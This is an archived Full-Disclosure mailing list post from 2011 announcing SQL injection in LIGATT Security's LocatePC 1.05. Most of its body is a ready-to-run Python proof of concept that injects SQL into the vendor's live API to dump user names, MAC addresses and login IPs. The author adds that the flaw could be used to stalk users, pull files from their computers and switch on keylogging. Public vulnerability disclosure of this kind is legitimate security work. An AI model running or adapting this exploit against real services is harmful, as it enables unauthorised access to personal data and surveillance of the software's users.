lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Wed, 09 Feb 2011 04:41:30 -0700
From: auto79576760@...hmail.com
To: full-disclosure@...ts.grok.org.uk
Subject: trivial SQL injection in LIGATT Security's
	LocatePC software

trivial SQL injection in LIGATT Security's LocatePC software
--------------------------------------------------------------------
----------

I'm going to skip all the drama and get straight to it. The 
software is crap.

Affected Software:

LocatePC 1.05

Consequences:

Arbitrary SELECT queries against the LocatePC and "mysql" database. 
The LocatePC database contains enough information to stalk all 
users of the software. It may be possible to instruct the software 
to upload arbitrary files from each user's computer to the LocatePC 
database, and then to later extract those files from the database.
Activating the software's keylogging functionality is both possible 
and hilarious.

Proof of Concept:

#!/usr/bin/python
import httplib
import urllib
import xml.etree.ElementTree
h = httplib.HTTPSConnection('www.ligattsecurity.com')
p = '''<Request 
funcname="uName,mac_address,last_login_ip,program_login from user 
where LENGTH(last_login_ip) > 0;--"></Request>'''
h.request("POST","/locatePC/api/",p,{"ContentType":"application/x-
www-form-urlencoded"})
r = h.getresponse()
data = urllib.unquote_plus(r.read())
for i in xml.etree.ElementTree.fromstring(data).iter():
	if i.tag == "Row":
		print ""
	elif i.tag == "Cell" and i.text != None:
		print i.text

Solution:

DON'T USE LOCATEPC!!!

References:

- http://www.ligattsecurity.com/solutions/locate-pc

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ